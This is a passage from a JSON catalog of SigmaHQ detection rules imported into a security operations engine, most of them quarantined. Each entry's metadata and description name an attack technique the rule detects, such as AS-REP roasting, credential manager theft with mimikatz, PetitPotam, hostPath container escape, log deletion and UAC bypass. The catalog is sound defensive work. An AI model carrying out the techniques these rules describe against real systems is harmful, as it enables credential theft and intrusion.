"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-as-rep-roasting-via-kerberos-tgt-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"3e2f1b2c-4d5e-11ee-be56-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberos_asrep_roasting.yml" } }, { "id": "sigmahq-sigma-3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "type": "detection", "name": "Hardware Model Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hardware-model-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml" } }, { "id": "sigmahq-sigma-3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "type": "detection", "name": "Potential Data Stealing Via Chromium Headless Debugging", "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1185", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-stealing-via-chromium-headless-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" } }, { "id": "sigmahq-sigma-3eaf6218-3bed-4d8a-8707-274096f12a18", "type": "detection", "name": "Wannacry Killswitch Domain", "description": "Detects wannacry killswitch domain dns queries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wannacry-killswitch-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3eaf6218-3bed-4d8a-8707-274096f12a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_wannacry_killswitch_domain.yml" } }, { "id": "sigmahq-sigma-3eb8c339-a765-48cc-a150-4364c04652bf", "type": "detection", "name": "IIS WebServer 
Access Logs Deleted", "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-webserver-access-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3eb8c339-a765-48cc-a150-4364c04652bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml" } }, { "id": "sigmahq-sigma-3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "type": "detection", "name": "OpenCanary - MSSQL Login Attempt Via SQLAuth", "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mssql-login-attempt-via-sqlauth.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/opencanary/opencanary_mssql_login_sqlauth.yml" } }, { "id": "sigmahq-sigma-3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "type": "detection", "name": "Use NTFS Short Name in Image", "description": "Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-ntfs-short-name-in-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" } }, { "id": "sigmahq-sigma-3f0f5957-04f8-4792-ad89-192b0303bde6", "type": "detection", "name": "Python WebServer Execution - Linux", "description": "Detects the execution of Python web servers via command line interface (CLI).\nAfter gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.\nThis technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/python-webserver-execution-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f0f5957-04f8-4792-ad89-192b0303bde6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml" } }, { "id": "sigmahq-sigma-3f3f3506-1895-401b-9cc3-e86b16e630d0", "type": "detection", "name": "Potential Direct Syscall of NtOpenProcess", "description": "Detects potential calls to NtOpenProcess directly from NTDLL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-direct-syscall-of-ntopenprocess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml" } }, { "id": "sigmahq-sigma-3f5491e2-8db8-496b-9e95-1029fce852d4", "type": "detection", "name": "Driver/DLL Installation Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. 
Attackers abuse this to install and run malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driver-dll-installation-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f5491e2-8db8-496b-9e95-1029fce852d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" } }, { "id": "sigmahq-sigma-3f6b7b62-61aa-45db-96bd-9c31b36b653c", "type": "detection", "name": "RDP Sensitive Settings Changed", "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n\nBelow is a list of registry keys/values that are monitored by this rule:\n\n- Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.\n- DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.\n- DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.\n- fAllowUnsolicited: Allows unsolicited remote assistance offers.\n- fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.\n- InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.\n- ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.\n- 
SecurityLayer: Specifies the security layer used for RDP connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-sensitive-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" } }, { "id": "sigmahq-sigma-3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "type": "detection", "name": "Syslog Clearing or Removal Via System Utilities", "description": "Detects specific commands commonly used to remove or empty the syslog. 
This is a technique often used by attackers to hide their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syslog-clearing-or-removal-via-system-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" } }, { "id": "sigmahq-sigma-3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "type": "detection", "name": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols", "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. 
This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-zonemap-setting-downgraded-to-mycomputer-zone-for-http-protocols.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" } }, { "id": "sigmahq-sigma-3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "type": "detection", "name": "Certificate Exported Via Certutil.EXE", "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml" } }, { "id": "sigmahq-sigma-401e5d00-b944-11ea-8f9a-00163ecd60ae", "type": "detection", "name": "AppLocker Prevented Application or Script from Running", "description": "Detects when AppLocker prevents the execution of an Application, DLL, Script, MSI, or Packaged-App from running.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1059.001", "T1059.003", "T1059.005", "T1059.006", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/applocker-prevented-application-or-script-from-running.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/applocker/win_applocker_application_was_prevented_from_running.yml" } }, { "id": "sigmahq-sigma-402b955c-8fe0-4a8c-b635-622b4ac5f902", "type": "detection", "name": "Container With A hostPath Mount Created", "description": "Detects creation of a container with a hostPath mount.\nA hostPath volume mounts a directory or a file from the node to the container.\nAttackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/container-with-a-hostpath-mount-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "402b955c-8fe0-4a8c-b635-622b4ac5f902", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_hostpath_mount.yml" } }, { "id": "sigmahq-sigma-402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "type": "detection", "name": "Malicious ShellIntel PowerShell Commandlets", "description": "Detects Commandlet names from ShellIntel exploitation scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-shellintel-powershell-commandlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-403c2cc0-7f6b-4925-9423-bfa573bed7eb", "type": "detection", "name": "Suspicious PowerShell Download - Powershell Script", "description": "Detects suspicious PowerShell download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" } }, { "id": "sigmahq-sigma-403ed92c-b7ec-4edd-9947-5b535ee12d46", "type": "detection", "name": "Crontab Enumeration", "description": "Detects usage of crontab to list the tasks of the user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crontab-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "403ed92c-b7ec-4edd-9947-5b535ee12d46", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" } }, { "id": "sigmahq-sigma-407aecb1-e762-4acf-8c7b-d087bcff3bb6", "type": "detection", "name": "Credential Manager Access By Uncommon Applications", "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::cred\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-manager-access-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml" } }, { "id": "sigmahq-sigma-40967487-139b-4811-81d9-c9767a92aa5a", "type": "detection", "name": "Deployment Deleted From Kubernetes Cluster", "description": "Detects the removal of a deployment from a Kubernetes cluster.\nThis could indicate disruptive activity aiming to impact business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-deleted-from-kubernetes-cluster.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40967487-139b-4811-81d9-c9767a92aa5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml" } }, { "id": "sigmahq-sigma-4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "type": "detection", "name": "Potential PetitPotam Attack Via EFS RPC Calls", "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-petitpotam-attack-via-efs-rpc-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" } }, { "id": "sigmahq-sigma-4096a49c-7de4-4da0-a230-c66ccd56ea5a", "type": "detection", "name": "Suspicious PowerShell Get Current User", "description": "Detects the use of PowerShell to identify the current logged user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", 
"mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-get-current-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" } }, { "id": "sigmahq-sigma-409f8a98-4496-4aaa-818a-c931c0a8b832", "type": "detection", "name": "Created Files by Microsoft Sync Center", "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/created-files-by-microsoft-sync-center.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" } }, { "id": "sigmahq-sigma-40aa399c-7b02-4715-8e5f-73572b493f33", "type": "detection", "name": "Suspicious File Download From IP Via Wget.EXE - Paths", "description": "Detects potentially suspicious file downloads directly from IP addresses and stored 
in suspicious locations using Wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-wget-exe-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40aa399c-7b02-4715-8e5f-73572b493f33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml" } }, { "id": "sigmahq-sigma-40b19fa6-d835-400c-b301-41f3a2baacaf", "type": "detection", "name": "VolumeShadowCopy Symlink Creation Via Mklink", "description": "Shadow Copies storage symbolic link creation using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/volumeshadowcopy-symlink-creation-via-mklink.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b19fa6-d835-400c-b301-41f3a2baacaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" } }, { "id": "sigmahq-sigma-40b1fbe2-18ea-4ee7-be47-0294285811de", "type": "detection", "name": "System Shutdown/Reboot - MacOs", "description": "Adversaries may 
shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-shutdown-reboot-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b1fbe2-18ea-4ee7-be47-0294285811de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" } }, { "id": "sigmahq-sigma-40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "type": "detection", "name": "ScreenSaver Registry Key Set", "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screensaver-registry-key-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" } }, { "id": 
"sigmahq-sigma-40b95d31-1afc-469e-8d34-9a3a667d058e", "type": "detection", "name": "Suspicious Csi.exe Usage", "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-csi-exe-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csi_execution.yml" } }, { "id": "sigmahq-sigma-40f9af16-589d-4984-b78d-8c2aec023197", "type": "detection", "name": "Potential UAC Bypass Via Sdclt.EXE", "description": "A General detection for sdclt being spawned as an elevated process. 
